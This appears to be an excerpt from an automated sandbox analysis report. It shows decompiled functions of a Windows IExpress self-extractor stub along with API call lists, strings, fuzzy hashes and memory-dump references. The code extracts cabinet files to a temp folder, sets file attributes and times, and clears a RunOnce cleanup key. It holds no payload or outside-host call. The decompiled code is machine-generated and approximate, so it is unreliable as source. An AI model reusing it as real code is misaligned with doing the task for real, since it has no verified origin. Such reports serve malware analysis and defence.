CloseHandle.KERNEL32(00000000,?,00F353F6,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F35823
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00F353F6,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F3582A

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F35794, 00F35796, 00F357E0, 00F35829
TMP4351$.TMP, xrefs: 00F357EA

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
API String ID: 747627703-2139698323
Opcode ID: c76a0cdf43bde4858ca9e9e71134c3acdbff190936a5077f5be0a575325edba6
Instruction ID: 19bfb4c7fc2d6bc8e626d0957d7a7dd95aa508a7fb0ee07b55f6b6788e8f2378
Opcode Fuzzy Hash: c76a0cdf43bde4858ca9e9e71134c3acdbff190936a5077f5be0a575325edba6
Instruction Fuzzy Hash: 101104B1A00218B7C7245B7A9C4DA9B7E5EEF86B70F104215B55AD3291DAB4DC06A2A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F3508F, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F3508F() {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E00F34538("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E00F34538("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E00F34327(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0xf39a88 = 0x800704c7;
								L10:
								return 0;
							}
							 *0xf39a88 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E00F34327(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0xf39a88 = 0x80070714;
					goto L10;
				}
				E00F34327(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xf39a88 = E00F3613C();
				goto L10;
			}

0x00f350a5
0x00f350b1
0x00f350b5
0x00f350e6
0x00f35112
0x00f3511a
0x00f35135
0x00f3513d
0x00f35146
0x00f35150
0x00f3515a
0x00000000
0x00f3515a
0x00f35148
0x00f35123
0x00000000
0x00f35125
0x00f3511d
0x00000000
0x00f3511d
0x00f350f4
0x00f350fa
0x00f35100
0x00000000
0x00f35100
0x00f350c3
0x00f350cd
0x00000000

APIs

Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
Part of subcall function 00F34538: SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552

LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,00000001,00000000,00F32DDE,00000000,00000001,00000000), ref: 00F350AB
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F350FA

Part of subcall function 00F34327: LoadStringA.USER32 ref: 00F3438D
Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F343C9

Part of subcall function 00F3613C: GetLastError.KERNEL32(00F35A9A), ref: 00F3613C

Strings

UPROMPT, xrefs: 00F35099, 00F350DA
<None>, xrefs: 00F3510C

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: LocalResource$AllocErrorFindFreeLastLoadMessageSizeofString
String ID: <None>$UPROMPT
API String ID: 2239024442-2980973527
Opcode ID: e32f797a772313d71f2f7e316030a030ba65a3d4ae95ca2132e6a50c2949ca19
Instruction ID: fbc51ae2119f0b8c2dee5151410c2ca193b23d507917fc4c27adc65292fdb985
Opcode Fuzzy Hash: e32f797a772313d71f2f7e316030a030ba65a3d4ae95ca2132e6a50c2949ca19
Instruction Fuzzy Hash: C211E6B1604208ABD3143B255C85B7B759EEBC9B71F50442DB642D2290DABCDC017231

Uniqueness

Uniqueness Score: -1.00%

Function 00F31E1D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F31E1D(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0xf38570 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00f31e2a
0x00f31e41
0x00f31e49
0x00f31e53
0x00000000
0x00f31e5c
0x00f31e49
0x00f31e65

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,?,?,?,00F35239), ref: 00F31E41
RegDeleteValueA.KERNELBASE(?,wextract_cleanup0,?,?,00F35239), ref: 00F31E53
RegCloseKey.ADVAPI32(?,?,?,00F35239), ref: 00F31E5C

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00F31E37
wextract_cleanup0, xrefs: 00F31E23, 00F31E4B

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
API String ID: 849931509-702805525
Opcode ID: 1d3834061a49fd292987b21dccdc56e65ec23ecd23b63a9475906e57efaef64e
Instruction ID: 6c86f5771224bf63781013e363823f62d22fdbfe692cf1fed337756c2efa9f6d
Opcode Fuzzy Hash: 1d3834061a49fd292987b21dccdc56e65ec23ecd23b63a9475906e57efaef64e
Instruction Fuzzy Hash: 0BE0487194030CBBD7159BA19D0EF597E6AE7047B1F540054B90560061DB76DD51B611

Uniqueness

Uniqueness Score: -1.00%

Function 00F34BE0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00F34BE0(void* __ebx, intOrPtr __edx, void* __edi, long _a4, long _a8) {
				signed int _v8;
				char _v268;
				void* __esi;
				signed int _t21;
				long _t22;
				long _t24;
				signed int _t25;
				long _t27;
				long _t28;
				struct HWND__* _t29;
				long _t30;
				long _t33;
				signed int _t36;
				long _t37;
				signed int _t39;
				void* _t42;
				void* _t54;
				long _t55;
				signed int _t56;

				_t54 = __edi;
				_t53 = __edx;
				_t42 = __ebx;
				_t21 =  *0xf38000; // 0xfdaca2c3
				_t22 = _t21 ^ _t56;
				_v8 = _t22;
				_t55 = _a8;
				if( *0xf39218 == 0) {
					_t24 = _a4;
					__eflags = _t24;
					if(_t24 == 0) {
						_t25 = E00F34D3F(_t55);
						L25:
						return E00F36C20(_t25, _t42, _v8 ^ _t56, _t53, _t54, _t55);
					}
					_t27 = _t24 - 1;
					__eflags = _t27;
					if(_t27 == 0) {
						L20:
						_t25 = 0;
						goto L25;
					}
					_t28 = _t27 - 1;
					__eflags = _t28;
					if(_t28 == 0) {
						_t29 =  *0xf385c0; // 0x0
						__eflags = _t29;
						if(_t29 != 0) {
							SetDlgItemTextA(_t29, 0x837,  *(_t55 + 4));
						}
						_t22 = E00F345AF( &_v268, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\",  *(_t55 + 4));
						__eflags = _t22;
						if(__eflags == 0) {
							L3:
							_t25 = _t22 | 0xffffffff;
							goto L25;
						} else {
							_t30 = E00F3464A( &_v268, __eflags);
							__eflags = _t30;
							if(_t30 != 0) {
								_push(0x180);
								_t22 = E00F34860( &_v268, 0x8302); // executed
								_t55 = _t22;
								__eflags = _t55 - 0xffffffff;
								if(_t55 == 0xffffffff) {
									goto L3;
								}
								_t22 = E00F346BC( &_v268);
								__eflags = _t22;
								if(_t22 == 0) {
									goto L3;
								}
								 *0xf39434 =  *0xf39434 + 1;
								_t25 = _t55;
								goto L25;
							}
							goto L20;
						}
					}
					_t33 = _t28 - 1;
					__eflags = _t33;
					if(_t33 == 0) {
						_t22 = E00F345AF( &_v268, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\",  *(_t55 + 4));
						__eflags = _t22;
						if(_t22 == 0) {
							goto L3;
						}
						_t53 =  *((intOrPtr*)(_t55 + 0x18));
						_t22 = E00F34B3C( *((intOrPtr*)(_t55 + 0x14)),  *((intOrPtr*)(_t55 + 0x18)),  *(_t55 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t22;
						if(_t22 == 0) {
							goto L3;
						}
						E00F34A60( *((intOrPtr*)(_t55 + 0x14))); // executed
						_t36 =  *(_t55 + 0x1c) & 0x0000ffff;
						__eflags = _t36;
						if(_t36 != 0) {
							_t37 = _t36 & 0x00000027;
							__eflags = _t37;
						} else {
							_t37 = 0x80;
						}
						_t39 = SetFileAttributesA( &_v268, _t37); // executed
						asm("sbb eax, eax");
						_t25 = ( ~_t39 & 0x00000002) - 1;
						goto L25;
					}
					_t22 = _t33 - 1;
					__eflags = _t22;
					if(_t22 == 0) {
						goto L3;
					}
					goto L20;
				}
				if(_a4 == 3) {
					_t22 = E00F34A60( *((intOrPtr*)(_t55 + 0x14)));
				}
				goto L3;
			}

0x00f34be0
0x00f34be0
0x00f34be0
0x00f34beb
0x00f34bf0
0x00f34bf2
0x00f34bfd
0x00f34c00
0x00f34c1c
0x00f34c1c
0x00f34c1f
0x00f34d26
0x00f34d2b
0x00f34d39
0x00f34d39
0x00f34c25
0x00f34c25
0x00f34c26
0x00f34cdf
0x00f34cdf
0x00000000
0x00f34cdf
0x00f34c2c
0x00f34c2c
0x00f34c2d
0x00f34c9d
0x00f34ca2
0x00f34ca4
0x00f34caf
0x00f34caf
0x00f34cc3
0x00f34cc8
0x00f34cca
0x00f34c11
0x00f34c11
0x00000000
0x00f34cd0
0x00f34cd6
0x00f34cdb
0x00f34cdd
0x00f34ce3
0x00f34cf4
0x00f34cf9
0x00f34cfe
0x00f34d01
0x00000000
0x00000000
0x00f34d0d
0x00f34d12
0x00f34d14
0x00000000
0x00000000
0x00f34d1a
0x00f34d20
0x00000000
0x00f34d20
0x00000000
0x00f34cdd
0x00f34cca
0x00f34c2f
0x00f34c2f
0x00f34c30
0x00f34c48
0x00f34c4d
0x00f34c4f
0x00000000
0x00000000
0x00f34c55
0x00f34c5d
0x00f34c62
0x00f34c64
0x00000000
0x00000000
0x00f34c69
0x00f34c6e
0x00f34c73
0x00f34c76
0x00f34c7f
0x00f34c7f
0x00f34c78
0x00f34c78
0x00f34c78
0x00f34c8a
0x00f34c92
0x00f34c97
0x00000000
0x00f34c97
0x00f34c32
0x00f34c32
0x00f34c33
0x00000000
0x00000000
0x00000000
0x00f34c35
0x00f34c06
0x00f34c0b
0x00f34c10
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 00F34C8A
SetDlgItemTextA.USER32 ref: 00F34CAF

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F34C43, 00F34CBE

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 3625706803-2312194364
Opcode ID: 8a4c297759d265268f540202f35205a347fc62a985e4686c4990f187700c434b
Instruction ID: 4191b6f99e3e093f0a0a626cc209c1c712651c521eb06f855c2b3b837a53700c
Opcode Fuzzy Hash: 8a4c297759d265268f540202f35205a347fc62a985e4686c4990f187700c434b
Instruction Fuzzy Hash: 1631C632A05609AACF20AF70DD41AAA73A4EF147B0F041558E886D65D0EF78FD85FB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F34B3C, Relevance: 4.5, APIs: 3, Instructions: 37
timeCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00F34B3C(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				signed int _t15;
				signed int _t20;

				_t20 = __ecx * 0x18;
				if( *((intOrPtr*)(_t20 + 0xf38c84)) != 1) {
					if(DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
						goto L1;
					} else {
						_t15 = SetFileTime( *(_t20 + 0xf38c94),  &_v12,  &_v12, _t14); // executed
						asm("sbb eax, eax");
						return  ~( ~_t15);
					}
				}
				L1:
				return 0;
			}

0x00f34b45
0x00f34b4f
0x00f34b65
0x00000000
0x00f34b79
0x00f34b85
0x00f34b8d
0x00000000
0x00f34b8f
0x00f34b65
0x00f34b51
0x00000000

APIs

DosDateTimeToFileTime.KERNEL32 ref: 00F34B5D
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F34B6F
SetFileTime.KERNELBASE(?,?,?,?), ref: 00F34B85

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 1bf3eac0dd122cb3de304e85d73f846363a7dd03b4788aff11cfdef7f0aaffe7
Instruction ID: f177b89ee5802c9510b6f3e29f8b2ad99ab9b3765fa91d80863829fb9a842d7f
Opcode Fuzzy Hash: 1bf3eac0dd122cb3de304e85d73f846363a7dd03b4788aff11cfdef7f0aaffe7
Instruction Fuzzy Hash: 5AF0B47290020DAF9B10DAB5CC45DFBF7BCEB44360F0405A6F925C2041EA30FA04BAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F3475B, Relevance: 3.1, APIs: 2, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00F3475B(CHAR* __ecx, signed int __edx) {
				void* _t7;
				signed int _t11;
				long _t15;
				CHAR* _t23;
				long _t24;

				_t11 = __edx;
				_t24 = 0x80000000;
				_t23 = __ecx;
				if((__edx & 0x00000003) != 0) {
					_t24 = 0x40000000;
				}
				if((_t11 & 0x00000100) == 0) {
					asm("sbb ebx, ebx");
					_t15 = ( ~(_t11 & 0x00000200) & 0x00000002) + 3;
				} else {
					if((_t11 & 0x00000400) == 0) {
						asm("sbb ebx, ebx");
						_t15 = ( ~(_t11 & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t15 = 1;
					}
				}
				_t7 = CreateFileA(_t23, _t24, 0, 0, _t15, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t15 == 3) {
					return _t7;
				} else {
					E00F347EA(_t23);
					return CreateFileA(_t23, _t24, 0, 0, _t15, 0x80, 0);
				}
			}

0x00f3475f
0x00f34761
0x00f34767
0x00f3476c
0x00f3476e
0x00f3476e
0x00f34779
0x00f347a2
0x00f347a7
0x00f3477b
0x00f34781
0x00f34790
0x00f34795
0x00f34783
0x00f34785
0x00f34785
0x00f34781
0x00f347b7
0x00f347c0
0x00f347e4
0x00f347c7
0x00f347c9
0x00000000
0x00f347db

APIs

CreateFileA.KERNELBASE(00000180,80000000,00000000,00000000,00007FFD,00000080,00000000,00000000,00000000,00000000,00F34909,?,00F34E12,*MEMCAB,00008000,00000180), ref: 00F347B7
CreateFileA.KERNEL32(00000180,80000000,00000000,00000000,00007FFD,00000080,00000000,?,00F34E12,*MEMCAB,00008000,00000180,CABINET), ref: 00F347DB

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6d719d4dc39d1081373c9d7343af1f41a48d17da41b05bf36537b004c0b47d44
Instruction ID: 895667e1b5f4e3b60950de781865d02b0aff6250657de3e6cec22c1c20d743f2
Opcode Fuzzy Hash: 6d719d4dc39d1081373c9d7343af1f41a48d17da41b05bf36537b004c0b47d44
Instruction Fuzzy Hash: 0D0187EAA913142AF3250839ACCABB7640CCB93778F280335BE62C12D0C7487C01B230

Uniqueness

Uniqueness Score: -1.00%

Function 00F349C0, Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00F349C0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0xf385cc; // 0x270
				_t9 = E00F33514(_t20);
				if( *0xf39218 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0xf38c94 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0xf39440; // 0x19000
							_t15 = _t14 + _t25;
							 *0xf39440 = _t15;
							if( *0xf381f8 != 0) {
								_t21 =  *0xf385c0; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xf39438, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00f349c5
0x00f349cb
0x00f349d7
0x00f349de
0x00f349f5
0x00f349fd
0x00f34a04
0x00f34a0a
0x00f34a0c
0x00f34a11
0x00f34a1a
0x00f34a1f
0x00f34a21
0x00f34a29
0x00f34a44
0x00f34a44
0x00f34a29
0x00f34a1f
0x00f349ff
0x00f349ff
0x00f349ff
0x00f34a4e
0x00f349d9
0x00f349dd
0x00f349dd

APIs

Part of subcall function 00F33514: MsgWaitForMultipleObjects.USER32 ref: 00F33533
Part of subcall function 00F33514: PeekMessageA.USER32 ref: 00F33546
Part of subcall function 00F33514: PeekMessageA.USER32 ref: 00F3356E

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00F349F5

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: 7e2bfce430166bbda910b358454877fabd8351fa0baaec73b80d74fdcb596590
Instruction ID: c5dd91147bffb3c2c5bcb740f6242ccb532421cca6b4999aba90cb131520f425
Opcode Fuzzy Hash: 7e2bfce430166bbda910b358454877fabd8351fa0baaec73b80d74fdcb596590
Instruction Fuzzy Hash: CF01B5326402099FDB149F18DC46BA6776AF740775F148224F925972F0CBB8A862EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F364E7, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F364E7(char* __ecx, void* __edx, char* _a4) {
				void* __edi;
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0xf3895b
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0xf3895c
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E00F314BD(_t16, _t10, _t16, _t6);
				}
				return 0x8007007a;
			}

0x00f364ef
0x00f364f1
0x00f364f3
0x00f364f5
0x00f364f5
0x00f364f8
0x00f364f8
0x00f364fa
0x00f364fb
0x00f364ff
0x00f36501
0x00f36506
0x00f3650f
0x00f36513
0x00f36517
0x00f36520
0x00f36522
0x00f36525
0x00f36525
0x00f36520
0x00f36526
0x00f36529
0x00f3652f
0x00f3652e
0x00f3652e
0x00000000
0x00f36539
0x00000000

APIs

CharPrevA.USER32(00F3895A,00F3895B,00000001,00000000,00F3895A,?,00F35F9C,00F31111,?), ref: 00F36517

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 27fac33170231fc2a731548518d8026af1fccac3fc7005d80d66fb28edd37fee
Instruction ID: c4bee3155f5d0e3451370274b0db8766a051ae8419c346eb6cf3e6792dd06e53
Opcode Fuzzy Hash: 27fac33170231fc2a731548518d8026af1fccac3fc7005d80d66fb28edd37fee
Instruction Fuzzy Hash: 66F028329042507BD332591DEC84B66BFCA9B86370F2C817AE8DAC7205C6658C01A2A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F360D0, Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00F360D0() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E00F35849( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E00F34327(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0xf39a88 = E00F3613C();
					_t9 = 0;
				}
				return E00F36C20(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00f360db
0x00f360e2
0x00f360f9
0x00f3611c
0x00f36124
0x00f360fb
0x00f36107
0x00f36111
0x00f36116
0x00f36116
0x00f36136

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F360F1

Part of subcall function 00F34327: LoadStringA.USER32 ref: 00F3438D
Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F343C9

Part of subcall function 00F3613C: GetLastError.KERNEL32(00F35A9A), ref: 00F3613C

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: fd9aebdf1d261edb6e6b445dfdb3ee1b0840c321497ebc87bbc1017e57426387
Instruction ID: 5aad66e2778aa989cacb8657387b13e956daab8dd0a150211234114df7b67a2e
Opcode Fuzzy Hash: fd9aebdf1d261edb6e6b445dfdb3ee1b0840c321497ebc87bbc1017e57426387
Instruction Fuzzy Hash: 8AF0E9B0B04208BBD710FB759C06BBA3BA8DB84720F50846AB886D7182DDB89D456750

Uniqueness

Uniqueness Score: -1.00%

Function 00F34A60, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F34A60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0xf38c84)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0xf38c94)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0xf38c80)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0xf38c80)) = 1;
				 *((intOrPtr*)(_t15 + 0xf38c88)) = 0;
				 *((intOrPtr*)(_t15 + 0xf38c90)) = 0;
				 *((intOrPtr*)(_t15 + 0xf38c8c)) = 0;
				return 0;
			}

0x00f34a66
0x00f34a74
0x00f34a98
0x00f34aa0
0x00000000
0x00f34aac
0x00f34aa4
0x00000000
0x00f34aa4
0x00f34a78
0x00f34a7e
0x00f34a84
0x00f34a8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00F34E4C,00000000), ref: 00F34A98

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 537732fb10917bd8aefab963333165a7be8d632270df8f8e601dc1040b771876
Instruction ID: 49ef1e512daf13efaa3563b255fbd9ec451716d7bb6dad3e32c18fde667ad77d
Opcode Fuzzy Hash: 537732fb10917bd8aefab963333165a7be8d632270df8f8e601dc1040b771876
Instruction Fuzzy Hash: 06F012715817049E47A0CF3A8801556BBD5FA953F0B14292EF56EC2150FF387642BB70

Uniqueness

Uniqueness Score: -1.00%

Function 00F364C8, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F364C8(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x00f364cb
0x00f364d4
0x00f364e1
0x00f364d6
0x00f364d8
0x00f364d8

APIs

GetFileAttributesA.KERNELBASE(?,00F34658,?,?,00F34CDB,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 00F364CB

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4acfb0db66d7e6174e561b32a6093ec78402f4feee83a02d096a596d2ec3fbb5
Instruction ID: b7430a1ede3d06e29a06dcb778bcf60f7b26e30db58b7bedd3ea3c5affc5b55c
Opcode Fuzzy Hash: 4acfb0db66d7e6174e561b32a6093ec78402f4feee83a02d096a596d2ec3fbb5
Instruction Fuzzy Hash: 51B092B692158412AA244232AD194563842E6D123ABE49BA4E132C00E0CA2EC855F110

Uniqueness

Uniqueness Score: -1.00%

Function 00F34BA0, Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F34BA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00f34baa
0x00f34bb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00F34BAA

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
